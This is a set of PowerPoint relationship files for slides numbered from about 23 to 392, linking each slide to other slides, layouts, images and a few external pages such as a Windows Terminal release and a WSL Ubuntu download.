<file path=ppt/slides/_rels/slide23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232.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slide" Target="slide431.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image267.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3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5.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6.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7.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241.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2.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275.png"/><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4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81.jpeg"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image280.jpeg"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide24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82.jpeg"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide24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83.jpe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248.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284.jpe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24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25.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slide" Target="slide26.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide3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29.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide431.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide28.xml"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide44.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide25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25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3.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide409.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide254.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slide" Target="slide2.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide254.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide255.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83.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide324.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide255.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide268.xml"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide297.xml"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide431.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide257.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide266.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide291.xml"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide254.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide256.xml"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide320.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide264.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide284.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide261.xml"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide314.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide277.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide259.xml"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide272.xml"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide307.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide25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255.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257.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58.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293.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image292.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide259.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31.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255.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261.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2.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63.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301.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image300.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide264.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5.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266.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308.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image307.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide268.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6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31.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image41.png"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide30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11.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide27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272.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73.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317.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16.bmp"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image315.bmp"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image314.bmp"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide27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image" Target="../media/image319.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image318.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide27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20.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide27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277.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78.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79.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31.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331.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image334.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33.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image332.gif"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide281.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slide" Target="slide431.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82.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336.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image340.gif"/><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gif"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image337.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide28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55.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284.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85.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86.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346.bmp"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image350.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bmp"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide287.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352.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide288.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slide" Target="slide431.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89.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image358.bmp"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image353.bmp"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image357.gif"/><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image" Target="../media/image355.gif"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image354.bmp"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide43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290.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image359.gif"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide255.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291.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92.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93.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image365.bmp"/><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68.bmp"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image367.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image366.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide29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370.bmp"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide295.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slide" Target="slide431.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9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373.gif"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image372.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide297.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298.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376.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image375.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide299.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80.bmp"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image379.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image378.bmp"/></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31.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31.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide30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382.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide301.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385.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image384.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide302.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image386.bmp"/><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388.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image387.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide30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slide" Target="slide431.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05.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image389.bmp"/><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391.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image390.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide306.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95.gif"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image394.bmp"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image393.bmp"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide307.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08.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image396.bmp"/><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bmp"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image397.bmp"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide309.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image400.bmp"/><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401.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide31.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slide" Target="slide255.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311.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55.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404.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide312.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slide" Target="slide431.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13.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396.bmp"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image408.bmp"/><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407.bmp"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image406.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image405.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide314.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15.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image414.bmp"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image409.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image413.bmp"/><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412.bmp"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image411.bmp"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image410.png"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide431.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide316.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415.bmp"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image419.bmp"/><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418.bmp"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image417.bmp"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image416.bmp"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide317.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slide" Target="slide431.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18.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image425.gif"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image420.bmp"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image424.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423.bmp"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image422.bmp"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image421.bmp"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide431.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide319.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428.bmp"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image427.bmp"/></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31.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slide" Target="slide431.xml"/><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21.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hyperlink" Target="mailto:test01@10.10.1.14" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image432.bmp"/><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322.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide255.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide431.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23.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 Target="slide255.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435.bmp"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image434.bmp"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide324.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide358.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide326.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide348.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide431.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide325.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide342.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide254.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide337.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide373.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide330.xml"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide365.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide325.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slide" Target="slide324.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32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4.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image114.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide327.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37.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image440.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slide" Target="slide431.xml"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image442.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide328.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slide" Target="slide431.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image446.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2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5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image449.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image448.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4.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image114.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide331.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453.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33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33.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460.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34.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464.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33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3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68.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide33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4.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image114.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide338.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473.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39.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477.png"/><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github.com/microsoft/terminal/releases/tag/v1.11.2921.0" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image71.png"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://aka.ms/wslubuntu2004" TargetMode="Externa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slide" Target="slide431.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide25.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide34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24.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image114.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide341.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slide" Target="slide431.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image481.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478.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide3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4.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image114.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide34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84.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image483.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide344.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4.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide431.xml"/><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76.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image475.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide34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24.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image114.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide34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78.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide347.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slide" Target="slide431.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image491.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9.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image488.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide34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4.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image114.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide349.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496.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95.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image494.gif"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image493.gif"/></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35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499.gif"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image498.gif"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image497.gif"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide35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gif"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide352.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slide" Target="slide431.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image506.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05.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image504.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image503.png"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image508.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide353.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slide" Target="slide431.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image512.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5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5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image515.gif"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image514.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide35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24.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image114.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide356.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519.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18.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image517.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image516.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide35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35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4.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image114.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide35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0.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide36.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360.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image" Target="../media/image522.png"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide431.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide324.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image476.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image475.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide36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24.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image114.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide36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image" Target="../media/image522.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide363.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490.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26.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image487.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image525.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide36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5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image528.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image527.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide36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slide" Target="slide324.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image114.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide36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31.bmp"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image530.bmp"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image529.bmp"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide367.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535.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34.bmp"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image533.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image532.bmp"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide36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4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image536.bmp"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide36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24.xml"/><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slide" Target="slide431.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide37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5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image537.bmp"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image478.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide371.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541.bmp"/><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40.bmp"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image539.bmp"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image538.bmp"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide37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5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image543.bmp"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image542.bmp"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide37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1.jpe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24.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image114.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide37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5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image545.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image544.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide37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5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image547.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image546.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide376.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4.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide431.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image548.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image476.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image475.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide37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24.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image114.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide378.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slide" Target="slide431.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image552.png"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide324.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37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 Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image554.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide3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8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slide" Target="slide385.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide384.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254.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide392.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide384.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38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11.jpeg"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image114.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide38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slide" Target="slide431.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide38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388.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476.png"/><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562.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide38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83.xml"/><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81.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slide" Target="slide431.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide390.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566.png"/><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391.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570.png"/><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569.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image568.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image567.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide39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11.jpeg"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image114.png"/></Relationships>
</file>

